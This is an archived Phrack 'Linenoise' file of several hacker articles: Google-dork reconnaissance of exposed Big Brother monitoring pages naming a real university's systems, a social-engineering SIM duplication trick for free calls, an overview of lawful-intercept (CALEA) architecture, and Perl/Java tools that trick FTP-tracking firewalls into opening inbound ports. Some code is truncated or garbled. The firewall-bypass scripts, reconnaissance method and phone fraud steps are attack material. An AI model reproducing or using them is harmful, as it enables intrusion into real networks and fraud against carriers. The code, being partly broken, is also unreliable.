AOH :: P60-0X03.TXT

Phrack 60 File 03: Linenoise

                            ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x03 of 0x10

|=-----------------------=[ L I N E N O I S E ]=-------------------------=|
|=-------------------------=[ Phrack Staff ]=----------------------------=|

--[ Contents

  1 - The Dark Side of NTFS
  2 - Watching Big Brother
  3 - Free mobile calls
  4 - Lawfully Authorized Electronic Surveillance [LAES]
  5 - Java Tears down the Firewall

--[ 1 - The Dark Side of NTFS

Ok, this didnt fit anywhere else so we put it here:

--[ 2 - Watching Big Brother

        by da_knight <>

    Have you ever wanted to be the one doing the watching? If you are a
system administrator of UNIX / Linux servers, then you may be aware of a
product called Big Brother, which can be downloaded from ''.
This article is by no means technical, simply because it doesn't need to
be. It is divided into two sections, so bear with me for the briefing on
Big Brother (BB).

    BB is a program that will monitor various computer equipment; things it
can monitor are connectivity, cpu utilization, disk usage, ftp status, http
status, pop3 status, etc. As you might imagine, this information is very
important to an organization. BB is your standard client / server setup.
The server software can run on various flavors of UNIX, Linux and NT. The
client software is available for UNIX, Linux, NT, Mac, Novell, AS/400, and
VAXEN; some client software is provided by 3rd-party vendors and not
supported by BB4 Technologies.

    The cool thing about this is all of this information is viewed on a web
page. So, if you have multiple servers that you have to maintain, with this
product you would be able to go to one web page and quickly get a status of
all of those servers - pretty handy. When everything is fine your status is
"green", major problems are indicated by "red".

    Example: The connectivity (conn) status is done by pinging the
equipment in question; if the ping fails then it would appear as a red zit
on the web page. When tests such as this fail, BB can be configured to
automatically page the administrator.

Here is a quick run down of the statuses, listed in order of severity:

red    - Trouble; you've got problems.
purple - No report; the client hasn't responded in the last 30 minutes.
yellow - Attention; a threshold has been crossed.
green  - OK; take the day off.
clear  - Unavailable; the test has been turned off.
blue   - Disabled; notification for this test has been turned off.

    The status is also reflected in the title of the web page, so it only
takes one red zit to cause the web page title to start with "red:Big
Brother"; we're going to get into this in a minute.

    A common thing for administrators to do is to monitor their most
important systems with this product, as well as the most important aspects
of each system. If you have a web server, you would want to monitor the
http and conn statuses just to make sure people are still able to connect
to the server. Other tests I have seen are to check Oracle, or to list all
connected users. Hell, they even have a way to add weather reports. The
point is, it's pretty limitless what can be monitored, it just depends on
what you deem important.

    Now that you have a little bit of an understanding what BB can do, I
want to quote two things from BB4 Technologies (BB4) FAQ - Section 5:
Security Considerations (
Everything in that section of the FAQ should be considered, but we'll focus
on these two.

    "BB does not need to run as root. We suggest creating a user 'bb' and
running bb as that user." "We recommend password-protecting the Big Brother
web pages"

    So, you ask yourself, why are these things important to me? Well, one,
you know that administrators who run this software probably have it setup
using the user 'bb', and that they may also be running it with root level
access. This gives you a valid user account on a system and this account
probably wouldn't be used by a human very often so the password could be
something simple. But that's not the point of this article. The second
thing is that BB4 realizes the information on these web pages is extremely
important and they recommend password-protecting them.

    Following this logic you then say these are web pages, so it's running
on a web server and if they're not password-protected and the server is
visible to the WWW, then...that's right search engines will find these
pages and serve them up when you know what to look for.

    What are you waiting for? Go to '' and search for
"green:Big Brother" (include the quotes; it makes it more refined). You
will get about 16,200 matches. Now that doesn't mean that those are all
unique because it will have numerous pages from the same site, but you get
the point. I would estimate that there are over 200 sites that can be
viewed this way. Remember to search for all the other statuses too, just
change the name of the color. One more thing, I chose Google for a reason.
Some of these sites no longer run the BB product, but Google has a nice
ability to view cached pages, so you can still glean information from them.

    After you scroll through the list of sites you will realize that the
majority of them are either small ISP's or colleges. I'm going to pick on a
college, an Ivy League one, no less. I can tell you from looking at this
particular BB site that the BB server is running on a computer called
'' and the IP address is ''. Also the
computer '' is having some serious issues. How did I
find the IP address? Simple; if you click on the "green" or whatever color
button under the "conn" column, you will see a web page that has
information similar to this:

--------------------------------------------------------- - conn

green Sun Jun 30 01:33:15 EDT 2002 Connection OK  PING
( from : 56(84) bytes of data. 64 bytes
from icmp_seq=0 ttl=255 time=379 usec

--- ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss round-trip
min/avg/max/mdev = 0.379/0.379/0.379/0.000 ms


    Right there you know that the ping command was trying to ping
'', in this case, '' and that it came
from '' or ''. Let's see what else we can
find out.

    I can see that almost all of their servers run Tripwire, so they are
UNIX systems, and you probably would have a hard time creating a backdoor
account on these systems. On another page, we get to see the users who are
currently logged in. Currently we have 33 users logged in, and seeing as
it's 1:33 AM, I think some people left their computers logged in.

    I want to get more information about Yale's servers, so let's go back
to Google and look for another page from Yale, but this time look for
''. Now we can get some good information. When this site
is displayed you will see quite a few servers, listed as well as several
departments. If you want to know what software '' is
using to run it's HTTP services just click on the 'green' button:

---------------------------------------------------- - http

green Sun Jun 30 01:45:21 EDT 2002 - Server OK
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: Date: Sun, 30
Jun 2002 05:45:21 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 12 Jan 1999 20:49:40 GMT ETag:
Content-Length: 2226

Seconds: 0.01 


    What the hell? They're actually running IIS 4.0? Don't they know how
insecure that is? But I digress. From that information you know that the
server is some version of Windows NT and it has IIS 4.0 running, that could
be handy.

    Zelda is also showing they monitor printers. Now that can be fun; what
if the message "I think therefore I hack!" is sent to the printer
''? And in case you're wondering, the
printer is an 'HP LaserJet 4050 Series'; I just had to click on the button
under the "printer" column to find that out.

    Elsewhere on this same site, I find that several servers are running
TELNET, POP3, Oracle, FTP, and IMAP. Most of these services will gladly
tell you what version of the software they are running. Oracle, for
instance, is even nice enough to show you all of the connected users. How
can you thank them enough for this valuable information?

    Also, it seems only the geologists at Yale feel they have data that is
of great importance. I wasn't able to view what they monitor because of
access permissions on their web site, but I do know that they are running
their web server on Apache version 1.3.26.

    As you can see, I would be able to gather an enormous amount of vital
infrastructure data in a few minutes. Plus, I didn't break any laws. These
web pages are posted in a manner that the entire world can view them. It
might take someone 10 minutes or more to find out a few facts about 1
particular system, but in that amount of time I found numerous facts about
over 40 systems at the same organization. Thanks Big Brother!

    I feel it should be mentioned that the information found on these web
pages is information that most organizations don't even let employees
outside of the IT department see. I guess I should feel special since Yale
must feel that I'm not a security risk, otherwise they would have made me
authenticate to their web sites.

    Imagine this; an ISP that lists all of their routers complete with IP's
and model information. If you had that, you could possibly rely on
vulnerabilities in SNMP discovered earlier this year, or better yet, rely
on the default accounts / passwords setup on these types of devices. I only
bring this up because I know I did come across an ISP that did list routers
and the majority of the sites returned by Google seemed to be smaller ISPs.

    Also, about searching on Google, I would recommend searching for
"red:Big Brother", because these pages will always give you more
information than when the system is running perfectly.

    Finally, I didn't write this article to condone breaking into systems
and providing a means to that end. I wrote this because security is
extremely important; with the information that is found because of this one
product your environment could be compromised. If you are a system
administrator for a site that shows up on Google you may want to secure
your BB web pages, because by the time you read this the world is going to
know your infrastructure.

--[ 3 - Free Mobile Calls

        by eurinomo

This bug can be utilized to make FREE CALS, FREE SMS, and even FREE 

    1st you have to see if you mobile network has the bug. Just call the
service free number (to don't waste money) and say to them that you card
is locked that you forgot your fone in your litle syster's room and your
mobile says "Sim Card is lock" or something, say that maybe yor sister have
wronged the puk because the phone was powered off and now it's on. Then the
guy must say that you have to go to one of theyr Mobile Shops and say the
problem and they will give you another card with the same number and money
as the old. Ask them how much it will cost and the guy must say it's for
free! :-)

Now the Matirial that youl need:
- A mobile phone not nokia (it's better to be yours and not unlocked)
- And a nokia(can be a unlocked 1 or steled or borrowed. Do as you wish!)

How to do it:

Mobile1 = Not nokia
Mobile2 = Nokia

Put the card in the mobile1 and enter your pin. When it booted up put this
code 3 times:
or try

    Check the manual and search for the code to change the puk if the above
examples dont work. Or give a email to motorola and say that you have a
motorola phone and that you want to change the puk and you know that is a
code to change (the code isn't ilegal and it's also specified in the 

    If the code isnt the one that i have telled is 1 nerby. If you have a 
motorola flare when you put **04* or **05* it'ill say "Enter the old Puk"
or something like that automatly and then ask the new puk code 2 times. But
the important is to lock your card, i think you can do it also if you wrong
the pin 3 times and then enter a wrong puk and vuala it's locked! But what i
was saing about the code it's was tested but you can try this last too, use
it in your on risk.

    Now goto the Mobile Shop and say what hapened (that your litle sister
or a doughter of an friend of your mother or something like that...) And
then they will dupicate the card and they will give you the new one and the
old one. At last they normaly give the 2.

    Now the easy part. Put the old card in the nokia and boot it up and you
see thats not locked!!! and if you put on anoher phone not nokia its says
that its locked, the Bug is a more nokia Bug that a network Bug. Now send a
SMS with the old card and see if disconted money. Then see if was disconted
from the new card if not than it's because the Network has the bug and you
can waste the money off the old card as you wish but you only have 2 weeks
or soo before they cut it out of the Network and it's completly lock, but
the new card stil have the same money and you can do it again and again
that i think they woldn't catch you.

This was tested in the Portugal Vodafone Mobile Phone Network.

--[ 4 - Introduction to Lawfully Authorized Electronic Surveillance (LAES)

           by Mystic <>

In 1994 Congress adopted the Communications Assistance for Law Enforcement
Act (CALEA). It's intent was to preserve but not expand the wiretapping
capabilities of law enforcement agencies by requiring telecommunication
providers to utilize systems that would allow government agencies a basic
level of access for the purpose of surveillance. The act however does not
only preserve the already existing capabilities of law enforcement to tap
communications, it enhances them, allowing the government to collect
information about wireless callers, tap wireless content, text messing, and
packet communications. The standard that resulted from this legislation is
called Lawfully Authorized Electronic Surveillance or LAES.

A Telecommunications Service Provider (TSP) that is CALEA compliant
provides means to access the fallowing services and information to Law
Enforcement Agencies (LEAs):

1. Non-call associated: Information about the intercept subjects that is
   not necessarily related to a call.

2. Call associated: call-identifying information about calls involving the
   intercept subjects.

3. Call associated and Non-call associated signaling information: Signaling
   information initiated by the subject or the network

4. Content surveillance: the ability to monitor the subjects'

This process is called the intercept function. The intercept function is
made up of 5 separate functions: access, delivery, collection, service
provider administration, and law enforcement administration.    

----[ 4.1  The Access Function (AF)

    The AF consists of one or more Intercept Access Points (IAPs) that
isolate the subject's communications or call-identifying information
unobtrusively. There are several different IAPs that can be utilized in
the intercept function. I have separated them into Call Associated and
Non-call Associated information IAPs and Content Surveillance IAPs:

Call Associated and Non-call Associated information IAPs

- Serving System IAP (SSIAP): gives non-call associated information.

- Call-Identifying Information IAP (IDIAP): gives call associated
  information and in the form of the fallowing call events for basic
  circuit calls:

  Answer      - A party has answered a call attempt
  Change      - The identity or identities of a call has changed
  Origination - The system has routed a call dialed by the subject or the
                system has translated a number for the subject
  Redirection - A call has been redirected (e.g., forwarded,
                diverted, or deflected)
  Release     - The facilities for the entire call have
	        been released TerminationAttempt - A call attempt to an
	        intercept subject has been detected

- Intercept Subject Signaling IAP (ISSIAP): provides access to
  subject-initiated dialing and signaling information. This includes if the
  intercept subject uses call forwarding, call waiting, call hold, or
  three-way calling. It also gives the LEA the ability to receive the
  digits dialed by the subject.

- Network Signaling IAP (NSIAP): Allows the LEA to be informed about
  network messages that are sent to the intercept subject. These messages
  include busy, reorder, ringing, alerting, message waiting tone or visual
  indication, call waiting, calling or redirection name/number information,
  and displayed text.

Content Surveillance IAPs

   The fallowing are content surveillance IAPs that transmit content using
a CCC or CDC. An interesting note about content surveillance is that
TSPs are not responsible for decrypting information that is encrypted by
the intercept subject unless the data was encrypted by the TSP and the
TSP has the means to decrypt it. 

- Circuit IAP (CIAP): accesses call content of circuit-mode communications. 

- Conference Circuit IAP (CCIAP): Provides access to the content of
  subject-initiated Conference Call services such as three-way calling and
  multi-way calling.

- Packet Data IAP (PDIAP): Provides access to data packets sent or received
  by the intercept subject.
 These include the fallowing services:

 ISDN user-to-user signaling
 ISND D-channel X.25 packet services
 Short Message Services (SMS) for cellular and Personal Communication Services
 Wireless packet-mode data services (e.g., Cellular Digital Packet Data
        (CDPD), CDMA,  TDMA, PCS1900, or GSM-based packet-mode data  services)
 X.25 services
 TCP/IP services
 Paging (one-way or two-way)
 Packet-mode data services using traffic channels

----[ 4.2  The Delivery Function (DF)

   The DF is responsible for delivering intercepted communications to one
or more Collection Functions. This is done over two distinct types of
channels: Call Content Channels (CCCs) and Call Data Channels (CDCs).
The CCCs are generally used to transport call content such as voice or
data communications. CCCs are either "combined" meaning that they carry
transmit and receive paths on the same channel, or "separated" meaning
that transmit and receive paths are carried on separate channels. The
CDCs are generally used to transport messages which report
which is text based such as Short Message Service (SMS). Information
over CDCs is transmitted using a protocol called the Lawfully Authorized
Electronic Surveillance Protocol (LAESP).

----[ 4.3  The Collection Function (CF)

   The CF is responsible for collecting and analyzing intercepted
communications and call-identifying information and is the
responsibility of the LEA.

----[ 4.4  The Service Provider Administration Function (SPAF)

   The SPAF is responsible for controlling the TSP's Access and Delivery Functions.

----[ 4.5  The Law Enforcement Administration Function (LEAF)

   The LEAF is responsible for controlling the LEA's Collection Function
and is the responsibility of the LEA.

   Now that I've introduced you to LAES lets look at an implementation of
it that is on the market right now and is being used by some TSPs:

Overview of the CALEAserver:

   The CALEAserver is manufactured by SS8 Networks. It is a collection and
delivery system for call information and content. It allows existing
networks to become completely CALEA compliant. It allows for a LEA to
monitor wireless and wire line communications and gather information about
the calls remotely. The CALEAserver interfaces with the network through
Signaling System 7 (SS7) which is an extension of the Public Switched
Telephone Network (PSTN). The CALEAserver is composed of three major
layers: the Hardware Platform Layer, the Network Platform Layer and the
Application Software Layer.

    The Hardware Platform Layer consists of the Switching Matrix and the
Computing Platform. The Switching Matrix is an industry standard
programmable switch. It contains T1 cards for voice transmission and cross
connect between switches, DSP cards for the conference circuits required
for the intercept and DTMF reception/generation, and CPU cards for
management of the switch. The Computing Platform is a simplex, rack
mounted, UNIX based machine. It is used to run the CALEAserver application
software that provides Delivery Function capabilities and controls the
Switching Matrix.

   The Network Platform Layer provides SS7 capability, as well as, call
processing APIs for the Application Software Layer. It also controls the
Switching Matrix.

   The Application Software Layer is where the Delivery and Service Provider
Administration functions are carried out. It isolates the interfaces
towards the Access and Collection Functions from the main delivery
functionality allowing for multiple Access and Collection Functions through
the Interface Modules that can be added or modified without impacting the
existing functionality.

System Capacity:

Configurable for up to: 

1000 Collection functions 
128 Access Function Interfaces 
32 SS7 links 
512 simultaneous call content intercepts on a single call basis 
64 T1 voice facilities 

Operating Environment: 

NEBS compliant, -48 volt, 19" rack mounted equipment 
Next-generation UltraSPARC processor 
66-MHz PCIbus 
Solaris UNIX operating system 
9Gbyte, 40-MB/sec SCSI disks 
512 Mbytes RAM standard 
Ethernet/Fast Ethernet, 10-BaseT and 100-BaseT 
Two RS-232C/RS-423 serial ports 
Programmable, scalable switch with up to 4000 port time slot interchange


Built in test tools for remote testing 
Full SS7 management system 
Alarm reporting and Error logging 
Automatic software fault recovery 
Automatic or manual disk backup 
SNMP support 
Optional support for X.25 and other collection function interfaces 
ITU standard MML and Java based GUI support 
Support of both circuit-switched and packet-switched networks 
Optional support for other access function interfaces as required for
         CALEA compliance, including: 
 *HLR (Home Location Register) 
 *VMS (Voice Mail System) 
 *SMS (Short Message System) 
 *CDPD wireless data 
 *Authentication Center 
 *Remote access provisioning 

   This concludes the introduction to LAES. This being only an introduction,
I've left out allot of details like protocol information. However, if you
are interested it learning more about LAES I would suggest reading the TIA
standard J-STD-025A. I hope you learned a little bit more about the
surveillance capabilities of LEAs. If you have any questions feel free to
contact me. Email address: see above.

--[ 5 - Java tears down the Firewall

Recently there has been much hype about various
insecurities in firewalls which support tracking of FTP sessions.
They could be tricked into thinking someone was opening an
FTP session by using a second TCP stack for example. I would
point you to CERT-URL for complete discussion.
There have been other techniques discussed such as embedding
some evil tags in HTML files which makes the browser opening
connections a firewall could interpret as FTP session.

Consider the following net:

[ Company ] ---- [ firewall ] --- [ some router ] --- [ WEB ]

Someone from 'Company' is browsing the web and has to
pass his packets across some router that is not under control
by Company but by attacker. Very common scenario no?

A few tools have been compiled to circumvent such setup.
I would even say, as soon as you enable FTP tracking you are lost.
More than one way ends in Rome.

Let me explain the small tools in short.

html-redirect: Attacker installs this on some router and
sets up redirect rule to port 8888.

class-inject:  Attacker starts this with eftepe.class. html-redirect
will redirect the HTML requests to this mini-httpd. It forces
browser inside Company which is shielded by firewall to load
the Java applet. This applet simulates active FTP session to
some router and it is allowed so because security manager sees
some router as origin of eftepe.class. Firewall will then open
port 7350 inbound so you can connect from some router:20 to Company:7350.

ftpd: Attacker must run this on some router in order to simulate FTP

createclass: script to create the correct java code which is
using apropriate IP (of some router) and port (on Company) then

Attacker could also sit on WEB (i.e. :) and embed evil
java applets. So take care because X runs on port 6000. :-)

It is really that simple, and its not even worth an own article,
thats why you find it here as a add-on.

#!/usr/bin/perl -w

# Puts a classfile into remote browser

use IO::Socket;

sub usage
	print "Usage: $0 <class file>\n\n";

my $classfile = shift || usage();
my $class;
my $classlen = (stat($classfile))[7];
open I, "<$classfile" or die $!;
read I, $class, $classlen;
close I;

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 8080,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	next unless $conn = $sock->accept();
	if (fork() > 0) {
	my $request = <$conn>;
	if ($request =~ /$classfile/) {
		my $classcontent = "HTTP/1.0 200 OK\r\n".
		 "Server: Apache/1.3.6 (Unix)\r\n".
		 "Content-Length: $classlen\r\n".
		 "Content-Type: application/octet-stream\r\n\r\n".$class;
		print $conn $classcontent;
		print "Injected to ", $conn->peerhost(), "\n";
	} else {
		print $conn "<HTML>".
		            "<APPLET CODE=\"$classfile\" WIDTH=1 HEIGHT=1>".
#!/usr/bin/perl -w

$ENV{"PATH"} = $ENV{"PATH"}."/usr/lib/java/bin";

print "Creating apropriate Java class-file for opeing port > 1023\n";
print "Enter IP to connect to on port 21 (e.g. ''):";
my $ip = <STDIN>; chop($ip);
print "Enter port to open:";
my $port = <STDIN>; chop($port);
my $p1 = int $port/256;
my $p2 = $port%256;

open O, ">" or die $!;
print O<<EOF;

import java.applet.*;
import java.util.*;

public class eftepe extends Applet {

public void init()
	try {
		Socket s = new Socket("$ip", 21);
		OutputStream os = s.getOutputStream();
		BufferedReader in = new BufferedReader(new InputStreamReader(s.getInputStream()));
		PrintWriter pw = new PrintWriter(os, true);
		pw.println("USER ftp\\r\\n");
		pw.println("PASS ftp\\r\\n");
		String port = new String("PORT ");
		String me = InetAddress.getLocalHost().getHostAddress();
		port += me.replace('.', ',');
		port += ",$p1,$p2\\r\\n";
	} catch (Exception e) {


print "Compiling into classfile...\n";
print "Done. Results are in eftepe.class\n";


#!/usr/bin/perl -w

use IO::Socket;

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 21,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	$conn = $sock->accept();
	if (fork() > 0) {
	print $conn "220 ready\r\n";
	<$conn>;  # user
	print $conn "331 Password please\r\n";
	<$conn>;  # pass
	print $conn "230 Login successful\r\n";
	<$conn>;  #port
	print $conn "200 PORT command successful.\r\n";
	exit 0;

#!/usr/bin/perl -w

# Simple HTTP Redirector

# iptables -A PREROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-port 8888

use IO::Socket;

sub usage
	print "Usage: $0 <IP|Host>\n".
	      "\t\tIP|Host -- IP or Host to redirect HTML reuests to\n\n";

my $r = shift || usage();
my $redir = "HTTP/1.0 301 Moved Permanently\r\n".
            "Location: http://$r:8080\r\n\r\n";

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 8888,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	next unless $conn = $sock->accept();
	if (fork() > 0) {
	my $request = <$conn>;
	print $conn "$redir";

#!/usr/bin/perl -w

use IO::Socket;

sub usage
	print "Usage: $0 <Host> <Port>\r\n";
	exit 0;

my $a = shift || usage();
my $b = shift || usage();

my $conn = IO::Socket::INET->new(PeerAddr => $a,
                                 PeerPort => $b,
                                 LocalPort => 20,
                                 Type => SOCK_STREAM,
                                 Proto => 'tcp') or die $!;

print $conn "GOTCHA\r\n";


# sample FTP session tracked firewall for 2.4 linux kernels
# modprobe ip_conntrack_ftp

iptables -F

iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 20 -m state --state ESTABLISHED -j ACCEPT

#iptables -A INPUT -p tcp --syn -j LOG
iptables -A INPUT -p tcp --syn -j DROP

|=[ EOF ]=---------------------------------------------------------------=|

AOH Site layout & design copyright © 2006 AOH